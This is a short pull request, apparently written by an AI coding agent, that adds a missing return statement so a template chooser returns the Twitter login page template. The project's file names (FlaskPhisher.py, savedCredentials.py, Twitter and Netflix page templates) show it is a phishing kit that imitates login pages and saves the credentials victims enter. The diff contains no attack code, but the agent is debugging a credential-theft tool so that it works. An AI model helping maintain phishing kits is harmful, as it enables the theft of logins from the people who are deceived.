### PR TITLE
Fix missing return path for Twitter template

### DIFF
--- a/Modules/templatePathChooser.py
+++ b/Modules/templatePathChooser.py
@@ -19,6 +19,7 @@ def templatePathChooser(number):
         return templatePath
     elif number == '7':
         templatePath = '/twitter/index.html'
+        return templatePath
     elif number == '8':
         templatePath = '/netflix/index.html'
         return templatePath


### PR DESCRIPTION
## Summary
- fix `templatePathChooser` not returning the Twitter template path

## Testing
- `python3 -m py_compile FlaskPhisher.py Modules/*.py savedCredentials.py`


------
https://chatgpt.com/codex/tasks/task_e_6843f0e601888327ac960cf0ddc8c1f6